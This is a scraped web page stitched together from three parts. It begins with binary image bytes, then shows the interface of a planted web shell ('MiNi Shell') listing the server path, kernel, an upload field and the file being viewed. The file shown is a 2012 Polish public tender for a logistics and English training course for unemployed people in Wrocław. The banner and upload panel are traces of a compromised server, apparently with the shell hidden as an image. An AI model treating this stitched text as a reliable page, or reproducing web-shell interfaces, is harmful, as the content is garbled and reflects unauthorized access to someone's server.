JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120214/36695-N-2012.html

<p class="kh_header"><b>Wrocław: Specjalista logistyk + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy), nauka języka angielskiego                 z możliwością przystąpienia do egzaminu językowego JET SET</b><br>
<b>Numer ogłoszenia: 36695 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.wroclaw.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Specjalista logistyk + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy), nauka języka angielskiego                 z możliwością przystąpienia do egzaminu językowego JET SET.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                          i przeprowadzeniu szkolenia grupowego w zakresie: Specjalista logistyk +                            4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy), nauka języka angielskiego z możliwością przystąpienia do egzaminu językowego JET SET.
2. Liczba uczestników szkolenia: 2 grupy po 14-16 osób w grupie.
3. Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy we Wrocławiu, z wykształceniem minimum średnim i podstawami znajomości obsługi komputera, które zostaną skierowane na kurs przez Zamawiającego po przeprowadzeniu  naboru.
4. Liczba godzin szkolenia: Szkolenie musi obejmować zajęcia teoretyczne, praktyczne,                   egzamin (nie dotyczy egzaminu językowego JET SET), praktykę u pracodawcy. Łącznie 520 godzin/grupa, w tym 80 godzin nauki języka angielskiego i 160 godzin praktyki u pracodawcy. Do czasu trwania szkolenia wlicza się czas przeznaczony na egzamin końcowy.
5. Źródło finansowania: Szkolenie będzie finansowane ze środków Funduszu Pracy.
6. Termin wykonania zamówienia: od dnia 28.03.2012r. do 30.04.2013r. 
Termin rozpoczęcia szkolenia: II kwartał 2012r.
7. Cel szkolenia: Celem szkolenia jest przygotowanie przyszłych pracowników działu logistyki  w zakresie logistyki zaopatrzenia (od planowania potrzeb materiałowych, realizacji, do składowania zakupów) i logistyki transportu.
8. Zakres szkolenia musi obejmować co najmniej następujące zagadnienia:
Moduł I:  Zagadnienia z zakresu logistyki zaopatrzenia i transportu - 280 godzin:
-podstawy logistyki,
-stosowanie przepisów bezpieczeństwa i ergonomii pracy na stanowisku logistyka,
-badanie rynku zakupów,
-planowanie potrzeb materiałowych dla wszystkich elementów struktury materiałowej                   z uwzględnieniem dostaw awaryjnych,
-realizowanie zakupu materiałów z uwzględnieniem procedury doboru dostawców zgodnie            z ustalonymi kryteriami,
-planowanie potrzeb transportowych i składowania zakupów,
-organizacja centrów logistycznych,
-współpraca z zawodowymi spedytorami i przewoźnikami, poprawne wypełnianie dokumentów występujących w procesach spedycyjnych i transportowych,
-wykorzystanie technologii informatycznych w logistyce,
-obsługa specjalistycznych oprogramowań, które wspierają pracę logistyka (np. program celny CELINA, programy spedycyjno-transportowe) - min. 50 godzin,
Moduł II: nauka języka angielskiego, w tym specjalistycznego słownictwa stosowanego               w logistyce - 80 godzin,
Moduł III: praktyka u pracodawcy zgodnie z kierunkiem szkolenia - 160 godzin.
9. Organizacja szkolenia:
9.1 Szkolenie należy zrealizować według planu nauczania obejmującego 40 godzin zegarowych w tygodniu. Jedną godzinę Zamawiający rozumie jako 60 minut (zajęcia edukacyjne liczące 45 minut oraz przerwa licząca 15 minut, przy czym długość przerw może być ustalona w sposób elastyczny; praktyka u pracodawcy musi odbywać się w pełnym wymiarze czasu pracy tj. po 8 godzin zegarowych dziennie);
9.2 Zajęcia muszą się odbywać w godz. między 08.00 - 18.00 (lub w godzinach pracy zakładu pracy, wyłączając godziny nocne) od poniedziałku do piątku (z wyłączeniem niedziel, świąt oraz dni ustawowo wolnych od pracy), w kolejno następujących po sobie dniach, liczba godzin dziennie nie może przekroczyć 8. W wyjątkowych sytuacjach dopuszczalne jest przeprowadzenie zajęć w soboty;
9.3 Miejsce wykonywania usługi: Miasto Wrocław;
9.4 Wykonawca przygotuje program szkolenia. Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Egzamin końcowy musi być ujęty w Programie szkolenia w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w harmonogramie szkolenia                           z uwzględnieniem daty tego egzaminu i ilości godzin przewidzianych na egzamin (nie dotyczy egzaminu językowego JET SET);
9.5 Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym;
9.6 Wszystkie zajęcia muszą być przeprowadzone z kadrą dydaktyczną wskazaną w ofercie. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.;
9.7 Zajęcia muszą odbywać się w salach szkoleniowych w siedzibie Wykonawcy lub salach konferencyjnych, gdzie zapewnione są właściwe warunki bezpieczeństwa i higieny pracy              i ochrony przeciwpożarowej. Sale powinny być przestronne, jasno oświetlone, dostosowane do liczby uczestników szkolenia i wyposażone w sprzęt techniczny, niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, ploter itp.).  Zapewniony musi być również dostęp do pomieszczeń sanitarnych w budynku, w którym odbywają się zajęcia w ramach szkolenia, w tym dostęp do WC zaopatrzony w środki higieny (tj. papier toaletowy, mydło, ręczniki papierowe lub suszarka do rąk) oraz dostęp do zaplecza socjalnego (tj. czajnik elektryczny lub inne urządzenie umożliwiające zaparzenie kawy lub herbaty). W przypadku, gdy Wykonawca nie jest dysponentem potencjału technicznego musi załączyć dokument potwierdzający prawo dysponowania lokalem lub sprzętem na czas realizacji zamówienia;
9.8 Dla każdego uczestnika musi być zagwarantowane miejsce siedzące (stolik/ławka bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek; 
9.9  W ramach prowadzonych zajęć praktycznych związanych z obsługą komputera należy zapewnić uczestnikom szkolenia swobodny dostęp do sprzętu komputerowego (minimalna odległość między dwoma monitorami pracującymi obok siebie nie powinna być mniejsza niż 60 cm) wyposażonego w licencjonowane oprogramowanie niezbędne do prawidłowego przeprowadzenia szkolenia, napęd CD-RW umożliwiający wielokrotny zapis płyt CD-RW. Na jednego uczestnika szkolenia musi przypadać jedno stanowisko komputerowe. Wszystkie stanowiska komputerowe muszą mieć dostęp do internetu;
9.10 Wykonawca dostosuje poziom nauki języka angielskiego do poziomu grupy; 
9.11 Wykonawca ma obowiązek ubezpieczyć od następstw nieszczęśliwych wypadków, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, uczestników szkolenia nie posiadających prawa do stypendium, od dnia rozpoczęcia udziału w szkoleniu. W celu potwierdzenia spełnienia obowiązku ubezpieczenia, najpóźniej w dniu rozpoczęcia szkolenia, instytucja szkoleniowa przedstawi Zamawiającemu kopię polisy ubezpieczeniowej za uczestników szkolenia wskazanych przez Zamawiającego. Ponadto Wykonawca ma obowiązek ubezpieczyć również uczestników szkolenia, którzy w trakcie szkolenia podjęli zatrudnienie, inną pracę zarobkową lub działalność gospodarczą od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsc szkolenia i z powrotem i którzy wyrazili chęć jego ukończenia. Wykaz tych osób, za które należy opłacić ubezpieczenie zostanie przekazany Wykonawcy przez Zamawiającego;
9.12 Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi szkolenia program szkolenia i harmonogram realizowanych zajęć;
9.13 Każdy uczestnik szkolenia otrzyma od Wykonawcy na własność podręczniki z zakresu obejmującego treści szkolenia (nie mogą być kserowane), inne materiały szkoleniowe                  i dydaktyczne, artykuły piśmiennicze w postaci zeszytu (z trwale zespolonymi kartkami), długopisu, zakreślacza, czystej płyty CD-RW umożliwiającej wielokrotny zapis dokumentów stworzonych przez uczestników kursu. Dodatkowe materiały (np. skrypty, materiały ksero dotyczące przedmiotu zamówienia, które muszą być czytelne, estetycznie wykonane i dobrej jakości) mogą być przekazywane w trakcie zajęć, zgodnie z ich tematyką; 
9.14 Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia obejmującej: dziennik zajęć edukacyjnych, indywidualne listy obecności uczestników szkolenia, protokoły  z egzaminów, karty ocen z okresowych sprawdzianów efektów kształcenia, rejestry wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia                 i uzyskanie kwalifikacji oraz do sprawowania nadzoru nad frekwencją uczestników szkolenia;
9.15 Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób mających trudności w procesie nauczania;
9.16 W trakcie szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza anonimowej ankiety oceniającej dostarczonej przez Zamawiającego w dniu podpisania umowy;
9.17 Szkolenie powinno zakończyć się egzaminem a nabyte umiejętności powinny być potwierdzone zaświadczeniem o ukończeniu szkolenia lub innym dokumentem potwierdzającym ukończenie szkolenia i uzyskanie kwalifikacji zawierającym, o ile przepisy odrębne nie stanowią inaczej, zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.): numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia,                            a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego  ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia Wykonawca dołącza do oferty;
9.18 Wykonawca zapewnia miejsca praktyk u pracodawcy dla wszystkich uczestników szkolenia w ramach realizowanego zamówienia (4 tygodnie praktyki). Wykonawca musi wskazać nazwy i adresy pracodawców, u których będą realizowane praktyki oraz opiekunów uczestników praktyk u danego pracodawcy. Wykaz miejsc praktyk oraz oświadczenia pracodawców (w oryginale) o zobowiązaniu przyjęcia na praktykę Wykonawca załącza do oferty. Poprzez określenie praktyka u pracodawcy Zamawiający rozumie odbycie                    u wskazanych przez Wykonawcę pracodawców praktyki polegającej na możliwości zastosowania w praktyce wiedzy i umiejętności zdobytych przez uczestników szkolenia podczas zajęć teoretycznych i praktycznych. Dla uzyskania jak najlepszych efektów szkolenia Zamawiający oczekuje, że u pojedynczego pracodawcy praktykę realizować będzie maksymalnie czterech uczestników zajęć. Wykonawca winien wskazać w ofercie co najmniej czterech pracodawców, u których realizowana będzie praktyka; 
9.19 Wykonawca nie ponosi żadnych kosztów związanych z zorganizowaniem egzaminu JET SET. Za organizację tego egzaminu tj. zakwalifikowanie osób, przeprowadzenie egzaminu, zapłatę za egzamin, wydanie certyfikatu JET SET będzie odpowiadał Zamawiający; 
9.20 Przedmiot zamówienia nie obejmuje świadczenia przez Wykonawcę usług cateringowych na rzecz uczestniczących w szkoleniu osób bezrobotnych skierowanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagany jest wpis do Rejestru Instytucji Szkoleniowych prowadzony przez wojewódzki urząd	pracy właściwy dla siedziby instytucji szkoleniowej, zgodnie z ustawą z dnia 20 kwietnia 2004r.                 	o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69, poz. 415 z późn.	zm.) oraz rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r.                   	w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236, poz. 2365 z późn. zm.); warunek	ten zostanie spełniony, jeżeli instytucja szkoleniowa złoży wraz z ofertą stosowne oświadczenie 	o posiadaniu aktualnego na rok 2012 wpisu do Rejestru Instytucji Szkoleniowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat	przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 	w tym 	okresie, przeprowadził z należytą starannością co najmniej 2 szkolenia grupowe	dla minimum 20 osób o tematyce odpowiadającej przedmiotowi zamówienia, tj. co najmniej             	2 szkolenia grupowe z zakresu logistyki w wymiarze nie krótszym niż po 100 godzin i 2 	szkolenia grupowe z zakresu nauki języka angielskiego w wymiarze nie krótszym niż po 40 	godzin, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Zamawiający przez 	grupę	szkolenia rozumie minimum 10 osób szkolących się w tym samym miejscu i w tym 	samym	czasie tj. na tych samych zajęciach. Wykonawca musi udokumentować w wykazie	zrealizowanych szkoleń, stanowiącym załącznik nr 4 do SIWZ, że wymieniona	usługa została	należycie wykonana załączając dokumenty odbiorców wskazanych w w/w wykazie,	potwierdzające, że każde ze zrealizowanych szkoleń zostało wykonane należycie (np.	referencje, podziękowania, pochwały itp.). Wykonawca jest zobowiązany dołączyć do wykazu	wykonanych usług - dokumenty lub informację - przedstawiające zakres tematyczny	zrealizowanych szkoleń, jeżeli nie wynika to z nazwy poszczególnego szkolenia, wskazanego            	w wykazie lub z dołączonych dokumentów, potwierdzających należyte wykonanie usługi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował salą wykładową przystosowaną do przeprowadzenia zajęć teoretycznych,	salą komputerową do przeprowadzenia zajęć z wykorzystaniem komputera, wyposażoną w 16	komputerów oraz miejscami realizacji praktyk  u pracodawców. Sale szkoleniowe muszą być	przestronne, jasno oświetlone, dostosowane do liczby 	uczestników szkolenia, 	spełniać warunki	zgodne z przepisami dotyczącymi bezpieczeństwa i higieny pracy oraz ochrony	przeciwpożarowej, zawierać osobne miejsca do siedzenia dla każdego uczestnika szkolenia	umożliwiające swobodne sporządzanie notatek	(stolik, ławka bądź krzesło z przystawką) oraz	muszą być wyposażone w sprzęt techniczny niezbędny do sprawnego prowadzenia zajęć (tj.	tablica, rzutnik, flipchart, ploter itp.). Zajęcia z obsługi komputera muszą odbywać się                          	w pracowni komputerowej, w której zapewniony jest swobodny dostęp uczestników do sprzętu	komputerowego (minimalna odległość między dwoma monitorami pracującymi obok siebie nie	powinna być mniejsza niż 60 cm) wyposażonego w licencjonowane oprogramowanie niezbędne 	do prawidłowego przeprowadzenia szkolenia, napęd CD-RW umożliwiający wielokrotny zapis	płyt CD-RW. Na jednego uczestnika szkolenia musi przypadać jedno stanowisko komputerowe.	Zapewniony musi być również dostęp do pomieszczeń sanitarnych w budynku, w którym	odbywają się zajęcia (w tym dostęp do WC zaopatrzonego w środki higieny) oraz do zaplecza	socjalnego. W przypadku, gdy Wykonawca nie jest dysponentem potencjału technicznego musi 	załączyć dokument potwierdzający prawo dysponowania lokalem lub sprzętem na czas	realizacji zamówienia. W ramach zamówienia Wykonawca musi zapewnić miejsca praktyk                	u pracodawcy dla wszystkich uczestników szkolenia. Dla uzyskania jak najlepszych efektów	szkolenia Zamawiający oczekuje, że u pojedynczego pracodawcy praktykę realizować będzie	maksymalnie czterech uczestników zajęć. Wykonawca winien wskazać w ofercie co najmniej	czterech pracodawców, u których realizowana będzie praktyka. 
	W oświadczeniu stanowiącym załącznik nr 11 do SIWZ Wykonawca musi wskazać nazwy                 	i adresy pracodawców, u których będą realizowane praktyki oraz opiekunów uczestników	praktyk z ramienia pracodawcy. Wraz z w/w wykazem miejsc praktyk do oferty muszą być	załączone oryginały oświadczeń pracodawców zobowiązujących się do przyjęcia na praktykę	uczestników szkolenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował:
	- co najmniej 2 osobami do prowadzenia zajęć z każdego modułu szkolenia, tj. osobno dla	zakresu z logistyki (moduł I) i osobno dla języka angielskiego (moduł II). 
	Osoby prowadzące zajęcia z modułu I muszą posiadać: 1) wykształcenie wyższe,                              	2) doświadczenie związane z realizacją minimum 2 szkoleń grupowych dla minimum 20 osób    	w zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć lub w przypadku	nauczycieli roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia.
	Osoby prowadzące zajęcia z modułu II muszą posiadać: 1) wykształcenie wyższe związane               	z kierunkiem prowadzonych zajęć, 2) doświadczenie związane z realizacją minimum 2 szkoleń	grupowych dla minimum 20 osób w zakresie tematycznym odpowiadającym zakresowi	prowadzonych zajęć lub w przypadku nauczycieli roczny staż pracy dydaktycznej związanej           	z przedmiotem zamówienia,
	- opiekunami uczestników 4-tygodniowych praktyk realizowanych u pracodawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
